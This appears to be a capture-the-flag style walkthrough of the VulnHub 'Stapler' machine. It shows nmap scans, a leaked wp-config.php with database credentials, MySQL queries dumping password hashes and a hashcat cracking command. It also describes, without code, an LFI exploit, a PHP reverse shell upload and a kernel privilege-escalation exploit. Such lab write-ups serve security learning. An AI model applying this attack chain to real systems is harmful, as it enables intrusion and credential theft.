Enumeration led us to vulnerable wordpress plugins which led to the initial foothold to the machine. Also, vulnerable version of OS led us to escalate our privileges to root.
Initial nmap scan with top 100 ports:
nmap -Pn stapler -oN nmap/initial which is:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-07 21:46 +0545
Nmap scan report for stapler (192.168.67.148)
Host is up (0.17s latency).
Not shown: 992 filtered tcp ports (no-response)
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
666/tcp open doom
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 20.08 seconds
Since port 80 was open but didn’t respond to ping, So I assumed that the server had disabled ping response.
Getting all port scan done, meanwhile further recon into the found open ports.
nmap scan with default nmap script, Version detection and OS detection:
sudo nmap -sC -sV -O -Pn -p20,21,22,80,139,666,3306 -oA nmap/all
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-07 21:49 +0545
Nmap scan report for stapler (192.168.67.148)
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.49.67
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
| 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_ 256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
53/tcp open tcpwrapped
80/tcp open http PHP cli server 5.5 or later
|_http-title: 404 Not Found
139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp open doom?
| fingerprint-strings:
| NULL:
| message2.jpgUT
| QWux
| "DL[E
| #;3[
| \xf6
| u([r
| qYQq
| Y_?n2
| 3&M~{
| 9-a)T
| L}AJ
|_ .npy.9
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
| mysql-info:
| Protocol: 10
| Version: 5.7.12-0ubuntu1
| Thread ID: 11
| Capabilities flags: 63487
| Some Capabilities: InteractiveClient, IgnoreSigpipes, Speaks41ProtocolOld, FoundRows, ODBCClient, Support41Auth, SupportsCompression, LongPassword, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, SupportsTransactions, LongColumnFlag, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: <VlJUArMLX:~\x19m02?;
| W
|_ Auth Plugin Name: mysql_native_password
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port666-TCP:V=7.92%I=7%D=7/7%Time=62C70407%P=x86_64-pc-linux-gnu%r(NULL
SF:,2D58,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\0\0\x15
SF:2\0\0\x0c\0\x1c\0message2\.jpgUT\t\0\x03\+\x9cQWJ\x9cQWux\x0b\0\x01\x04
SF:\xf5\x01\0\0\x04\x14\0\0\0\xadz\x0bT\x13\xe7\xbe\xefP\x94\x88\x88A@\xa2
SF:\x20\x19\xabUT\xc4T\x11\xa9\x102>\x8a\xd4RDK\x15\x85Jj\xa9\"DL\[E\xa2\x
SF:0c\x19\x140<\xc4\xb4\xb5\xca\xaen\x89\x8a\x8aV\x11\x91W\xc5H\x20\x0f\xb
SF:2\xf7\xb6\x88\n\x82@%\x99d\xb7\xc8#;3\[\r_\xcddr\x87\xbd\xcf9\xf7\xaeu\
SF:xeeY\xeb\xdc\xb3oX\xacY\xf92\xf3e\xfe\xdf\xff\xff\xff=2\x9f\xf3\x99\xd3
SF:\x08y}\xb8a\xe3\x06\xc8\xc5\x05\x82>`\xfe\x20\xa7\x05:\xb4y\xaf\xf8\xa0
SF:\xf8\xc0\^\xf1\x97sC\x97\xbd\x0b\xbd\xb7nc\xdc\xa4I\xd0\xc4\+j\xce\[\x8
SF:7\xa0\xe5\x1b\xf7\xcc=,\xce\x9a\xbb\xeb\xeb\xdds\xbf\xde\xbd\xeb\x8b\xf
SF:4\xfdis\x0f\xeeM\?\xb0\xf4\x1f\xa3\xcceY\xfb\xbe\x98\x9b\xb6\xfb\xe0\xd
SF:c\]sS\xc5bQ\xfa\xee\xb7\xe7\xbc\x05AoA\x93\xfe9\xd3\x82\x7f\xcc\xe4\xd5
SF:\x1dx\xa2O\x0e\xdd\x994\x9c\xe7\xfe\x871\xb0N\xea\x1c\x80\xd63w\xf1\xaf
SF:\xbd&&q\xf9\x97'i\x85fL\x81\xe2\\\xf6\xb9\xba\xcc\x80\xde\x9a\xe1\xe2:\
SF:xc3\xc5\xa9\x85`\x08r\x99\xfc\xcf\x13\xa0\x7f{\xb9\xbc\xe5:i\xb2\x1bk\x
SF:8a\xfbT\x0f\xe6\x84\x06/\xe8-\x17W\xd7\xb7&\xb9N\x9e<\xb1\\\.\xb9\xcc\x
SF:e7\xd0\xa4\x19\x93\xbd\xdf\^\xbe\xd6\xcdg\xcb\.\xd6\xbc\xaf\|W\x1c\xfd\
SF:xf6\xe2\x94\xf9\xebj\xdbf~\xfc\x98x'\xf4\xf3\xaf\x8f\xb9O\xf5\xe3\xcc\x
SF:9a\xed\xbf`a\xd0\xa2\xc5KV\x86\xad\n\x7fou\xc4\xfa\xf7\xa37\xc4\|\xb0\x
SF:f1\xc3\x84O\xb6nK\xdc\xbe#\)\xf5\x8b\xdd{\xd2\xf6\xa6g\x1c8\x98u\(\[r\x
SF:f8H~A\xe1qYQq\xc9w\xa7\xbe\?}\xa6\xfc\x0f\?\x9c\xbdTy\xf9\xca\xd5\xaak\
SF:xd7\x7f\xbcSW\xdf\xd0\xd8\xf4\xd3\xddf\xb5F\xabk\xd7\xff\xe9\xcf\x7fy\x
SF:d2\xd5\xfd\xb4\xa7\xf7Y_\?n2\xff\xf5\xd7\xdf\x86\^\x0c\x8f\x90\x7f\x7f\
SF:xf9\xea\xb5m\x1c\xfc\xfef\"\.\x17\xc8\xf5\?B\xff\xbf\xc6\xc5,\x82\xcb\[
SF:\x93&\xb9NbM\xc4\xe5\xf2V\xf6\xc4\t3&M~{\xb9\x9b\xf7\xda-\xac\]_\xf9\xc
SF:c\[qt\x8a\xef\xbao/\xd6\xb6\xb9\xcf\x0f\xfd\x98\x98\xf9\xf9\xd7\x8f\xa7
SF:\xfa\xbd\xb3\x12_@N\x84\xf6\x8f\xc8\xfe{\x81\x1d\xfb\x1fE\xf6\x1f\x81\x
SF:fd\xef\xb8\xfa\xa1i\xae\.L\xf2\\g@\x08D\xbb\xbfp\xb5\xd4\xf4Ym\x0bI\x96
SF:\x1e\xcb\x879-a\)T\x02\xc8\$\x14k\x08\xae\xfcZ\x90\xe6E\xcb<C\xcap\x8f\
SF:xd0\x8f\x9fu\x01\x8dvT\xf0'\x9b\xe4ST%\x9f5\x95\xab\rSWb\xecN\xfb&\xf4\
SF:xed\xe3v\x13O\xb73A#\xf0,\xd5\xc2\^\xe8\xfc\xc0\xa7\xaf\xab4\xcfC\xcd\x
SF:88\x8e}\xac\x15\xf6~\xc4R\x8e`wT\x96\xa8KT\x1cam\xdb\x99f\xfb\n\xbc\xbc
SF:L}AJ\xe5H\x912\x88\(O\0k\xc9\xa9\x1a\x93\xb8\x84\x8fdN\xbf\x17\xf5\xf0\
SF:.npy\.9\x04\xcf\x14\x1d\x89Rr9\xe4\xd2\xae\x91#\xfbOg\xed\xf6\x15\x04\x
SF:f6~\xf1\]V\xdcBGu\xeb\xaa=\x8e\xef\xa4HU\x1e\x8f\x9f\x9bI\xf4\xb6GTQ\xf
SF:3\xe9\xe5\x8e\x0b\x14L\xb2\xda\x92\x12\xf3\x95\xa2\x1c\xb3\x13\*P\x11\?
SF:\xfb\xf3\xda\xcaDfv\x89`\xa9\xe4k\xc4S\x0e\xd6P0");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=7/7%OT=21%CT=20%CU=36884%PV=Y%DS=2%DC=I%G=Y%TM=62C7044
OS:4%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=10C%TI=Z%TS=8)OPS(O1=M54EST1
OS:1NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7%O6=M54
OS:EST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T
OS:=40%W=7210%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T
OS:2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N
OS:)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
OS:IE(R=N)
Network Distance: 2 hops
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -19m58s, deviation: 34m37s, median: 0s
| smb2-time:
| date: 2022-07-07T16:04:53
|_ start_date: N/A
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
| Computer name: red
| NetBIOS computer name: RED\x00
| Domain name: \x00
| FQDN: red
|_ System time: 2022-07-07T17:04:53+01:00
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.42 seconds
There was a ftp server open with anonyomous login enabled, port 80 with phpCli, 3306 with mysql which looked suspicious.
FTP:
Harry, make sure to update the banner when you get a chance to show who has access here was displayed.Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.So, there was nothing that we could do about the ftp server, but got three usernames which is Elly,John and Harry.
The full port scan results came as:
Command: nmap -vvv -Pn -p- stapler -oA nmap/all
# Nmap 7.92 scan initiated Thu Jul 7 21:47:39 2022 as: nmap -vvv -Pn -p- -oA nmap/all stapler
Nmap scan report for stapler (192.168.67.148)
Host is up, received user-set (0.17s latency).
Scanned at 2022-07-07 21:47:39 +0545 for 541s
Not shown: 65524 filtered tcp ports (no-response)
PORT STATE SERVICE REASON
20/tcp closed ftp-data conn-refused
21/tcp open ftp syn-ack
22/tcp open ssh syn-ack
53/tcp open domain syn-ack
80/tcp open http syn-ack
123/tcp closed ntp conn-refused
137/tcp closed netbios-ns conn-refused
139/tcp open netbios-ssn syn-ack
666/tcp open doom syn-ack
3306/tcp open mysql syn-ack
12380/tcp open unknown syn-ack
Read data files from: /usr/bin/../share/nmap
# Nmap done at Thu Jul 7 21:56:40 2022 -- 1 IP address (1 host up) scanned in 540.48 seconds
which showed that port 12380 was open.
Aggressive nmap scan into port 12380:
Command: nmap -Pn -p12380 -A stapler -oN nmap/port12380
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-07 22:05 +0545
Nmap scan report for stapler (192.168.67.148)
Host is up (0.29s latency).
PORT STATE SERVICE VERSION
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.41 seconds
curl stapler:12380 gave some garbage value so using curl stapler:12380 | html2text which gave:
****** Coming Soon ******
*** Sorry guys, BSides happened too quick! Didn't have enough time to finish
the website. ***
** Try again next year. **
Made with by Creative_Tim. Free download here.
Trying curl stapler:12380/robots.txt | html2text gave the same results.
Getting into the web-browser and looking at http://stapler:12380/blogblog gave nothing so tried https://stapler:12380/blogblog and finally got a wordpress site.
In https://stapler:12380/blogblog/wp-content/, found a directory with lising of plugins, themes and uploads.
GET /blogblog/wp-content/plugins gave:
****** Index of /blogblog/wp-content/plugins ******
[[ICO]] Name Last_modified Size Description
===========================================================================
[[PARENTDIR]] Parent_Directory -
[[DIR]] advanced-video-embed-embed- 2015-10-14 13:52 -
videos-or-playlists/
[[ ]] hello.php 2016-06-03 23:40 2.2K
[[DIR]] shortcode-ui/ 2015-11-12 17:07 -
[[DIR]] two-factor/ 2016-04-12 22:56 -
===========================================================================
Apache/2.4.18 (Ubuntu) Server at stapler Port 12380
Looking for plugin advanced-video-embed-embed-videos-or-playlists/ on exploit-db, found a LFI vuln with a exploit code.
downloaded the python script from vulnhub, modified it according to the need and ran the script to get the shell access.
Downloaded the file compromised which had:
<?php
/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, and ABSPATH. You can find more information by visiting
* {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
* Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'plbkac');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'V 5p=[.Vds8~SX;>t)++Tt57U6{Xe`T|oW^eQ!mHr }]>9RX07W<sZ,I~`6Y5-T:');
define('SECURE_AUTH_KEY', 'vJZq=p.Ug,]:<-P#A|k-+:;JzV8*pZ|K/U*J][Nyvs+}&!/#>4#K7eFP5-av`n)2');
define('LOGGED_IN_KEY', 'ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU<cr.wm?|jqZH:YMv;zu@tM7P:4o');
define('NONCE_KEY', 'j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO');
define('AUTH_SALT', 'I{gDlDs`Z@.+/AdyzYw4%+<WsO-LDBHT}>}!||Xrf@1E6jJNV={p1?yMKYec*OI$');
define('SECURE_AUTH_SALT', '.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*>#z+p>nVi10`XOUq (Zml~op3SG4OG_D');
define('LOGGED_IN_SALT', '[Zz!)%R7/w37+:9L#.=hL:cyeMM2kTx&_nP4{D}n=y=FQt%zJw>c[a+;ppCzIkt;');
define('NONCE_SALT', 'tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN/9xeTsK]#ga_9:hJ');
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each a unique
* prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*/
define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
define('WP_HTTP_BLOCK_EXTERNAL', true);
The database user and password is compromised, and thus can be accessed from phpmyadmin: user:root pass:plbkac
used mysql -u root -p -h stapler to access the mysql database.
show databases;
use wordpress;
show tables;
select * from wp_users;
MySQL [wordpress]> select * from wp_users;
+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+
| 1 | John | $P$B7889EMq/erHIuZapMB8GEizebcIy9. | john | [email protected] | http://localhost | 2016-06-03 23:18:47 | | 0 | John Smith |
| 2 | Elly | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 | elly | [email protected] | | 2016-06-05 16:11:33 | | 0 | Elly Jones |
| 3 | Peter | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 | peter | [email protected] | | 2016-06-05 16:13:16 | | 0 | Peter Parker |
| 4 | barry | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 | barry | [email protected] | | 2016-06-05 16:14:26 | | 0 | Barry Atkins |
| 5 | heather | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 | heather | [email protected] | | 2016-06-05 16:18:04 | | 0 | Heather Neville |
| 6 | garry | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 | garry | [email protected] | | 2016-06-05 16:18:23 | | 0 | garry |
| 7 | harry | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 | harry | [email protected] | | 2016-06-05 16:18:41 | | 0 | harry |
| 8 | scott | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 | scott | [email protected] | | 2016-06-05 16:18:59 | | 0 | scott |
| 9 | kathy | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 | kathy | [email protected] | | 2016-06-05 16:19:14 | | 0 | kathy |
| 10 | tim | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 | tim | [email protected] | | 2016-06-05 16:19:29 | | 0 | tim |
| 11 | ZOE | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 | zoe | [email protected] | | 2016-06-05 16:19:50 | | 0 | ZOE |
| 12 | Dave | $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. | dave | [email protected] | | 2016-06-05 16:20:09 | | 0 | Dave |
| 13 | Simon | $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 | simon | [email protected] | | 2016-06-05 16:20:35 | | 0 | Simon |
| 14 | Abby | $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. | abby | [email protected] | | 2016-06-05 16:20:53 | | 0 | Abby |
| 15 | Vicki | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 | vicki | [email protected] | | 2016-06-05 16:21:14 | | 0 | Vicki |
| 16 | Pam | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 | pam | [email protected] | | 2016-06-05 16:42:23 | | 0 | Pam |
+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+
16 rows in set (0.003 sec)
Extracted the hashes and used hashcat to crack into the hashes.
hashcat -m 400 -a 0 hashes /etc/share/wordlists/rockyou.txt to crack the hash. Finally found the password of the user john which is incorrect.
Finally uploaded a php reverse shell into the server using the wordpress plugin and gained an initial foothold into the system.
After getting foothold into the server, got into /tmp, downloaded linpeas.sh and ran the script.
Found:
OS: Linux version 4.4.0-21-generic (buildd@lgw01-06) (gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2) ) #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: red.initech
Writable folder: /dev/shm
which pointed toward the OS version. Searched it in exploit-db and found that this particular version is having an issue of incorrect use of dynamic memory during program operation which can lead to local privilege escalation, by using the pointer to that memory.
After some looking into google, found the CVE number was CVE-2016-4557 and found an exploit to it.Finally, used the UAF(Use-After-Free) vulnerability to escalate the privileges to root.